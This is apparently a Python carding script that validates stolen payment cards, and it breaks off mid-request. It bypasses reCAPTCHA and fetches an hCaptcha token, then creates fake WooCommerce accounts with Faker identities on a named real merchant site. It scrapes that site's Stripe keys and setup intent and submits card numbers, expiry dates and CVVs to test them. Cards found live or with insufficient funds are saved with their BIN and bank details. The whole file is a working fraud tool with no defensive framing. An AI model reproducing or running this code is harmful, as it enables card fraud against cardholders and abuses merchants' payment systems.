import sys
import subprocess

def ensure_package(import_name, pip_name=None):
    try:
        return __import__(import_name)
    except ImportError:
        pkg = pip_name or import_name
        print(f"[+] Installing missing package: {pkg}")
        subprocess.check_call([sys.executable, "-m", "pip", "install", pkg])
        return __import__(import_name)

requests = ensure_package("requests")
colorama = ensure_package("colorama")
faker = ensure_package("faker")
user_agent = ensure_package("user_agent")
from queue import Queue
import time
import json
import base64
from threading import Lock
import secrets
import threading
import uuid
import re
import os
import random
from requests import Session
import urllib3
from http.cookiejar import LWPCookieJar, MozillaCookieJar
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
from urllib.parse import quote_plus
from urllib.parse import parse_qsl, urlencode, parse_qs
from datetime import datetime
from typing import Any, Dict, Optional, Tuple, List
from enum import Enum, auto

from colorama import Fore, Style, init
from faker import Faker
from user_agent import generate_user_agent

init(autoreset=True)
NUM_THREADS = 6

print_lock = Lock()
def safe_print(*args, **kwargs):
    with print_lock:
        print(*args, **kwargs)


# ----------- START COLOR MAP ----------

RED     = Fore.RED     or "\033[31m"
GREEN   = Fore.GREEN   or "\033[32m"
WHITE   = Fore.WHITE   or "\033[37m"
YELLOW  = Fore.YELLOW  or "\033[33m"
BLACK   = Fore.BLACK   or "\033[30m"
CYAN    = Fore.CYAN    or "\033[36m"
BLUE    = Fore.BLUE    or "\033[34m"
MAGENTA = Fore.MAGENTA or "\033[35m"


LRED     = Fore.LIGHTRED_EX     or "\033[91m"
LGREEN   = Fore.LIGHTGREEN_EX   or "\033[92m"
LWHITE   = Fore.LIGHTWHITE_EX   or "\033[97m"
LYELLOW  = Fore.LIGHTYELLOW_EX  or "\033[93m"
LBLACK   = Fore.LIGHTBLACK_EX   or "\033[90m"
LCYAN    = Fore.LIGHTCYAN_EX    or "\033[96m"
LBLUE    = Fore.LIGHTBLUE_EX    or "\033[94m"
LMAGENTA = Fore.LIGHTMAGENTA_EX or "\033[95m"

RESET   = Style.RESET_ALL or "\033[0m"

# ----------- END COLOR MAP ----------

USA = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.62",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.62",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.62",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
]

def gstr(src, a, b):
    try:
        return src.split(a, 1)[1].split(b, 1)[0]
    except Exception:
        return ""

def parse_card(s: str):
    s = s.strip()
    if not s:
        return None

    parts = [p.strip() for p in s.split("|")]
    if len(parts) != 4:
        return None

    cc, mm, yy, cvv = parts

    if not (cc.isdigit() and mm.isdigit() and yy.isdigit() and cvv.isdigit()):
        return None

    if len(yy) == 4:
        yy = yy[-2:]
    elif len(yy) == 1:
        yy = "0" + yy

    return cc, mm.zfill(2), yy.zfill(2), cvv


class RecaptchaSolver:
    _BASE = "https://www.google.com/recaptcha"
    _HEADERS = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/120.0.0.0 Safari/537.36"
        ),
    }

    _RE_API = re.compile(r"(api2|enterprise)/anchor\?(.*)")
    _RE_C = re.compile(r'value="([^"]+)"')
    _RE_TOKEN = re.compile(r'"rresp","([^"]+)"')

    def __init__(
        self,
        proxies: Optional[List[str]] = None,
        cookie_file: Optional[str] = "cookies.txt",
        timeout: int = 10,
        retry: int = 3,
    ) -> None:
        self.proxies = proxies or []
        self.timeout = timeout
        self.retry = retry

        self.session = requests.Session()
        self.session.headers.update(self._HEADERS)

        self.cookie_jar = None
        if cookie_file:
            self.cookie_jar = MozillaCookieJar(cookie_file)
            try:
                self.cookie_jar.load(ignore_discard=True, ignore_expires=True)
                self.session.cookies.update(self.cookie_jar)
            except FileNotFoundError:
                pass
            except Exception:
                self.cookie_jar.clear()

        self._last_params: Optional[dict] = None
        self._last_c: Optional[str] = None

    # ===================== PUBLIC =====================

    def solve(self, anchor_url: str) -> str:
        api, params = self._parse(anchor_url)
        proxy = self._choose_proxy()

        anchor_html = self._request(
            "get",
            f"{self._BASE}/{api}/anchor",
            params=params,
            proxy=proxy,
        )

        c_value = self._extract(self._RE_C, anchor_html, "c_value")
        self._last_params = params
        self._last_c = c_value

        payload = self._payload(params, c_value)

        reload_html = self._request(
            "post",
            f"{self._BASE}/{api}/reload",
            params={"k": params["k"]},
            data=payload,
            proxy=proxy,
        )

        self._save_cookies()
        return self._extract(self._RE_TOKEN, reload_html, "token")

    def solve_any(self, url: str) -> str:
        if "/anchor" in url:
            return self.solve(url)

        if "/reload" not in url:
            raise ValueError("Unsupported URL type")

        if not self._last_params or not self._last_c:
            raise ValueError("Reload without prior anchor context")

        params = dict(parse_qsl(url.split("?", 1)[1]))
        k = params.get("k")
        if not k:
            raise ValueError("Missing site key")

        proxy = self._choose_proxy()
        payload = self._payload(self._last_params, self._last_c)

        reload_html = self._request(
            "post",
            url,
            params={"k": k},
            data=payload,
            proxy=proxy,
        )

        self._save_cookies()
        return self._extract(self._RE_TOKEN, reload_html, "token")

    # ===================== INTERNAL =====================

    def _parse(self, url: str) -> Tuple[str, dict]:
        m = self._RE_API.search(url)
        if not m:
            raise ValueError("Invalid reCAPTCHA anchor URL")

        api = m.group(1)
        params = dict(parse_qsl(m.group(2)))

        for key in ("k", "v", "co"):
            if key not in params:
                raise ValueError(f"Missing param: {key}")

        return api, params

    @staticmethod
    def _payload(p: dict, c: str) -> str:
        return urlencode({
            "v": p["v"],
            "reason": "q",
            "c": c,
            "k": p["k"],
            "co": p["co"],
        })

    @staticmethod
    def _extract(regex: re.Pattern, text: str, name: str) -> str:
        m = regex.search(text)
        if not m:
            raise ValueError(f"Failed to extract {name}")
        return m.group(1)

    def _choose_proxy(self) -> Optional[dict]:
        if not self.proxies:
            return None
        p = random.choice(self.proxies)
        return {"http": p, "https": p}

    def _request(
        self,
        method: str,
        url: str,
        *,
        params: Optional[dict] = None,
        data: Optional[str] = None,
        proxy: Optional[dict] = None,
    ) -> str:
        last_exc = None

        for _ in range(self.retry):
            try:
                r = self.session.request(
                    method,
                    url,
                    params=params,
                    data=data,
                    proxies=proxy,
                    timeout=self.timeout,
                )
                r.raise_for_status()
                return r.text
            except Exception as e:
                last_exc = e
                time.sleep(0.5 + random.random())

        raise RuntimeError(f"{method.upper()} failed: {last_exc}")

    def _save_cookies(self) -> None:
        if not self.cookie_jar:
            return
        try:
            for c in self.session.cookies:
                self.cookie_jar.set_cookie(c)
            self.cookie_jar.save(ignore_discard=True, ignore_expires=True)
        except Exception:
            pass

class FlowResult(Enum):
    LIVE = auto()
    LIVE_CCN = auto()
    DECLINED = auto()
    THREE_DS = auto()
    UNKNOWN = auto()

class ResponseNormalizer:
    @staticmethod
    def normalize(resp: Any) -> Dict[str, Any]:
        if not isinstance(resp, dict):
            return {}

        data = resp.get("data")
        if isinstance(data, dict):
            return data

        return resp


class StripeFlow:
    def __init__(self, session=None, Auswitch: str = "Mozilla/5.0"):
        self.session = session or requests.Session()
        self.Auswitch = Auswitch

    def _clean(self, s: Optional[str]) -> str:
        s = (s or "UNKNOWN").strip()
        while "  " in s:
            s = s.replace("  ", " ")
        return s

    def _get_bin_info(self, bincc: str) -> str:
        try:
            headers = {
                'User-Agent': self.Auswitch,
                'Accept': 'application/json',
                'Accept-Version': '3'
            }

            r = self.session.get(
                f'https://binlist.io/lookup/{bincc}',
                headers=headers,
                timeout=20,
                verify=False
            )

            data = r.json() if isinstance(r.json(), dict) else {}

            scheme = self._clean(data.get("scheme"))
            ctype = self._clean(data.get("type"))
            category = self._clean(data.get("category"))

            country = data.get("country") or {}
            alpha = self._clean(country.get("alpha3") or country.get("alpha2"))

            bank = data.get("bank") or {}
            bank_name = self._clean(bank.get("name"))

            return f"{scheme}|{ctype}|{category}|{alpha}|{bank_name}"

        except Exception:
            return "UNKNOWN|UNKNOWN|UNKNOWN|UNKNOWN|UNKNOWN"
    def handle(self, data, cc_num, mm, yy, cvv, filename: str = "live.txt") -> bool:
        global LIVE, DECLINED, ERROR, TOTAL

        intent = self._extract_intent(data)
        status = self._safe_get(intent, "status")
        next_action = intent.get("next_action") if isinstance(intent, dict) else None

        error = self._extract_error(data, intent)
        msg, reason = self._build_reason(error)

        card = f"{cc_num}|{mm}|{yy}|{cvv}"
        bincc = cc_num[:6]
        info = self._get_bin_info(bincc)



        if status == "succeeded":
            safe_print(f" {card} --> {Fore.GREEN}LIVE{Style.RESET_ALL} | Approved.")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|SUCCEEDED|{info}\n")
            return True

        if status == "succeeded" and not next_action:
            safe_print(f" {card} --> {Fore.GREEN}LIVE 200{Style.RESET_ALL} | Approved.")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|SUCCEEDED|{info}\n")
            return True

        if msg and "you cannot add a new payment method so soon" in msg.lower():
            safe_print(f" {card} --> {Fore.YELLOW}RATE_LIMIT{Style.RESET_ALL} | {msg}")
            return False

        if status == "requires_payment_method":
            return self._handle_requires_payment_method(card, cc_num, msg, reason)

        if status == ("requires_action"):
            safe_print(f" {card} --> {Fore.YELLOW}3DS{Style.RESET_ALL} | Three3ds secure")
            return False


        if error:
            self._print_declined(card, msg)
            return False


        safe_print(f" {card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL} | {msg}")
        return False

    def _handle_requires_payment_method(
        self,
        card: str,
        cc_num: str,
        msg: Optional[str],
        reason: str,
        filename: str = "live.txt"
    ) -> bool:
        global LIVE, DECLINED, ERROR, TOTAL
        bincc = cc_num[:6]
        info = self._get_bin_info(bincc)

        if "Your card has insufficient funds." in reason or "insufficient_funds" in reason:
            safe_print(f" {card} --> {Fore.GREEN}LIVE{Style.RESET_ALL} | insufficient_funds")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|INSUFFICIENT_FUNDS|{info}\n")
            return True

        if "Your card's security code is incorrect" in reason or "incorrect_cvc" in reason:
            safe_print(f" {card} --> {Fore.GREEN}LIVE CCN{Style.RESET_ALL} | incorrect_cvc")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|CCN APPROVED|{info}\n")
            return True

        if any(k in reason for k in ("authentication", "three_d", "3d")):
            safe_print(f" {card} --> {Fore.YELLOW}3DS{Style.RESET_ALL} | Three3ds secure")
            return False


        self._print_declined(card, msg)
        return False

    @staticmethod
    def _print_declined(card: str, msg: Optional[str]) -> None:
        global LIVE, DECLINED, ERROR, TOTAL
        if msg:

            safe_print(f" {card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL} | {msg}")
        else:
            safe_print(f" {card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL}")

    @staticmethod
    def _extract_intent(data: Any) -> Dict[str, Any]:
        if not isinstance(data, dict):
            return {}

        error = data.get("error")
        if isinstance(error, dict):
            for key in ("payment_intent", "setup_intent"):
                if isinstance(error.get(key), dict):
                    return error[key]

        for key in ("payment_intent", "setup_intent", "data"):
            if isinstance(data.get(key), dict):
                return data[key]

        return data

    @staticmethod
    def _extract_error(
        data: Any,
        intent: Dict[str, Any],
    ) -> Optional[Dict[str, Any]]:

        if isinstance(data, dict):
            inner = data.get("data")
            if isinstance(inner, dict):
                err = inner.get("error")
                if isinstance(err, dict):
                    return err

        if isinstance(data, dict):
            err = data.get("error")
            if isinstance(err, dict):
                return err

        if isinstance(intent, dict):
            for key in ("last_payment_error", "last_setup_error"):
                err = intent.get(key)
                if isinstance(err, dict):
                    return err

        return None

    @staticmethod
    def _build_reason(
        err: Optional[Dict[str, Any]]
    ) -> Tuple[Optional[str], str]:

        if not isinstance(err, dict):
            return None, ""

        msg = err.get("message") if isinstance(err.get("message"), str) else None

        parts = []
        for key in ("decline_code", "code", "type"):
            val = err.get(key)
            if isinstance(val, str):
                parts.append(val.lower())

        return msg, " ".join(parts)

    @staticmethod
    def _safe_get(obj: Any, key: str) -> Optional[str]:
        if isinstance(obj, dict):
            val = obj.get(key)
            if isinstance(val, str):
                return val
        return None

    @staticmethod
    def _save_success(card: str, filename: str = "live.txt") -> None:
        try:
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + "\n")
        except Exception:
            pass

def checkx(line, proxy=None):
    see = requests.Session()
    if proxy:
        p = proxy
        if "://" not in p:
            p = "http://" + p

        see.proxies = {
            "http": p,
            "https": p,
        }
    res = parse_card(line)
    if not res:
        return

    cc, mm, yy, cvv = res

    UserAgent = random.choice(USA) or generate_user_agent()

    flow = StripeFlow()
    fingerprintId = __import__("hashlib").sha256(f"{UserAgent}|{proxy or ''}".encode()).hexdigest()
    fake = Faker("en_US")
    firstname = fake.first_name()
    lastname = fake.last_name()
    zipcode = fake.postcode()
    try:
        zipcode = fake.zipcode()
    except Exception:
        zipcode = fake.postalcode()
    email = f"{Faker().user_name().lower()}_{secrets.token_hex(4)}@{random.choice(['gmail.com','yahoo.com','outlook.com','hotmail.com','icloud.com','proton.me','protonmail.com','live.com','msn.com','yahoo.co.id','yahoo.co.uk','yahoo.co.jp','ymail.com','rocketmail.com','live.uk','live.co.uk','live.ca','outlook.co.uk','outlook.jp','tutanota.com','tutanota.de','mailbox.org','zoho.com','zohomail.com','fastmail.com','pm.me','yandex.com','yandex.ru','mail.ru','gmx.com','gmx.de','web.de','seznam.cz','laposte.net','orange.fr','edumail.vn','student.mail','alumni.email','icousd.com','ymail.cc','byom.de','momoi.re','mailgun.co','inboxkitten.com','maildrop.cc', 'web.de', 'byom.my.id'])}"
    today = datetime.now().strftime("%Y-%m-%d")
    today1 = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    solver = RecaptchaSolver()
    try:

        solver = RecaptchaSolver(
            proxies=None,
            cookie_file="cookies.txt"
        )

        anchor_url = "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LceRKkZAAAAADHK39AtMIAs8uLwhJzNXMSG7Pb3&co=aHR0cHM6Ly9kb25hdGUuYmJjY2hpbGRyZW5pbm5lZWQuY28udWs6NDQz&hl=en&v=N67nZn4AqZkNcbeMu4prBgzg&size=invisible&anchor-ms=20000&execute-ms=30000&cb=xewq6duxz8u3"

        token_reCAPTCHA = solver.solve(anchor_url)

        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://haccpplus.com.au/my-account/add-payment-method/',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-user': '?1',
            'sec-gpc': '1',
            'upgrade-insecure-requests': '1',
            'user-agent': UserAgent,
        }

        r = see.get('https://haccpplus.com.au/my-account/', headers=headers, verify=False)
        txt = r.text
        regnonce = gstr(txt, 'woocommerce-register-nonce" value="', '"')

        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded',
            'origin': 'https://haccpplus.com.au',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://haccpplus.com.au/my-account/',
            'upgrade-insecure-requests': '1',
            'user-agent': UserAgent,
        }

        data = {
            'email': email,
            'password': 'Anjing553123442@sdA',
            'wc_order_attribution_source_type': 'organic',
            'wc_order_attribution_referrer': 'https://www.google.com/',
            'wc_order_attribution_utm_campaign': '(none)',
            'wc_order_attribution_utm_source': 'google',
            'wc_order_attribution_utm_medium': 'organic',
            'wc_order_attribution_utm_content': '(none)',
            'wc_order_attribution_utm_id': '(none)',
            'wc_order_attribution_utm_term': '(none)',
            'wc_order_attribution_utm_source_platform': '(none)',
            'wc_order_attribution_utm_creative_format': '(none)',
            'wc_order_attribution_utm_marketing_tactic': '(none)',
            'wc_order_attribution_session_entry': 'https://haccpplus.com.au/my-account/',
            'wc_order_attribution_session_start_time': today1,
            'wc_order_attribution_session_pages': '7',
            'wc_order_attribution_session_count': '1',
            'wc_order_attribution_user_agent': UserAgent,
            'woocommerce-register-nonce': regnonce,
            '_wp_http_referer': '/my-account/',
            'register': 'Register',
        }

        r = see.post('https://haccpplus.com.au/my-account/', headers=headers, data=data, verify=False)

        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://haccpplus.com.au/my-account/',
            'upgrade-insecure-requests': '1',
            'user-agent': UserAgent,
        }

        r = see.get('https://haccpplus.com.au/my-account/payment-methods/',  headers=headers, verify=False)

        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://haccpplus.com.au/my-account/payment-methods/',
            'user-agent': UserAgent,
        }

        r = see.get('https://haccpplus.com.au/my-account/add-payment-method/', headers=headers, verify=False)
        txt = r.text
        pklive = gstr(txt, ',"api_key":"', '"')
        acct = gstr(txt, '"account":"', '"') or gstr(txt, '"stripeAccount":"', '"')
        restNonce = gstr(txt, '"rest_nonce":"', '"')

        headers = {
            'accept': 'application/json, text/javascript, */*; q=0.01',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'origin': 'https://haccpplus.com.au',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://haccpplus.com.au/my-account/add-payment-method/',
            'user-agent': UserAgent,
            'x-requested-with': 'XMLHttpRequest',
        }

        data = {
            'payment_method': 'stripe_cc',
            '_wpnonce': restNonce,
        }

        r = see.post(
            'https://haccpplus.com.au/?wc-ajax=wc_stripe_frontend_request&path=/wc-stripe/v1/setup-intent',
            headers=headers,
            data=data,
            verify=False
        )
        txt = r.text
        seti = gstr(txt, 'intent":{"id":"', '"')
        clientSecret = gstr(txt, 'client_secret":"', '"')

        headers = {
            'accept': 'application/json',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded',
            'origin': 'https://js.stripe.com',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://js.stripe.com/',
            'user-agent': UserAgent,
        }

        data = {
            'stripe_js_id': str(uuid.uuid4()),
            'referrer_host': 'haccpplus.com.au',
            'key': pklive,
            '_stripe_account': acct,
            'request_surface': 'web_card_element_popup',
        }

        r = see.post('https://merchant-ui-api.stripe.com/elements/wallet-config', headers=headers, data=data, verify=False)
        txt = r.text
        sitekey1 = gstr(txt, 'link_hcaptcha_site_key":"', '"')

        headers = {
            'accept': 'application/json',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'content-type': 'text/plain',
            'origin': 'https://newassets.hcaptcha.com',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://newassets.hcaptcha.com/',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-site',
            'sec-fetch-storage-access': 'none',
            'sec-gpc': '1',
            'user-agent': UserAgent,
        }

        params = {
            'v': fingerprintId,
            'host': 'b.stripecdn.com',
            'sitekey': sitekey1,
            'sc': '1',
            'swa': '1',
            'spst': '0',
        }

        r = see.post('https://api.hcaptcha.com/checksiteconfig', params=params, headers=headers, verify=False)
        txt = r.text
        tokenChay = "P1_" + gstr(txt, 'req":"', '"')

        headers = {
            'accept': 'application/json',
            'accept-language': 'en-US,en;q=0.8',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded',
            'origin': 'https://js.stripe.com',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://js.stripe.com/',
            'user-agent': UserAgent,
        }

        data = {
            "payment_method_data[type]": "card",
            "payment_method_data[card][number]": cc,
            "payment_method_data[card][cvc]": cvv,
            "payment_method_data[card][exp_month]": mm,
            "payment_method_data[card][exp_year]": yy,
            "payment_method_data[guid]": "N/A",
            "payment_method_data[muid]": "N/A",
            "payment_method_data[sid]": "N/A",
            "payment_method_data[pasted_fields]": "number",
            "payment_method_data[payment_user_agent]": "stripe.js/badb92382f; stripe-js-v3/badb92382f; card-element",
            "payment_method_data[referrer]": "https://haccpplus.com.au",
            "payment_method_data[time_on_page]": "451448",
            "payment_method_data[client_attribution_metadata][client_session_id]": "32ed3c7e-5d86-4cbb-abad-e225fabf1010",
            "payment_method_data[client_attribution_metadata][merchant_integration_source]": "elements",
            "payment_method_data[client_attribution_metadata][merchant_integration_subtype]": "card-element",
            "payment_method_data[client_attribution_metadata][merchant_integration_version]": "2017",
            "expected_payment_method_type]": "card",
